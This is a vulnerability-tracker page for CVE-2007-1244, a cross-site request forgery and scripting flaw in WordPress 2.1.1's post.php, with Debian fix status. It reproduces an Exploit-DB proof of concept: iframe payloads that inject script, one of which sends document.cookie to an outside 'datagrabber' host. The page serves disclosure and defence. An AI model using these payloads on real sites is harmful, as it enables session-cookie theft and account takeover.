CVE-2007-1244

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Cross-site request forgery (CSRF) vulnerability in the AdminPanel in WordPress 2.1.1 and earlier allows remote attackers to perform privileged actions as administrators, as demonstrated using the delete action in wp-admin/post.php. NOTE: this issue can be leveraged to perform cross-site scripting (XSS) attacks and steal cookies via the post parameter.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-29682 webapps php verified text · 1 KB

Samenspender · 2007-02-26

WordPress Core 2.1.1 - 'post.php' Cross-Site Scripting

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/22735/info

Wordpress is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Wordpress 2.1.1 is vulnerable to this issue; other versions may also be affected. 

Cookie in an Alert Box: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol= %27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://www.example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);im age.src=%27http://www.example.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe>

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.1.2-1`
sid	Fixed	`2.1.2-1`
forky	Fixed	`2.1.2-1`
bullseye	Fixed	`2.1.2-1`
bookworm	Fixed	`2.1.2-1`

References

https://security-tracker.debian.org/tracker/CVE-2007-1244

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.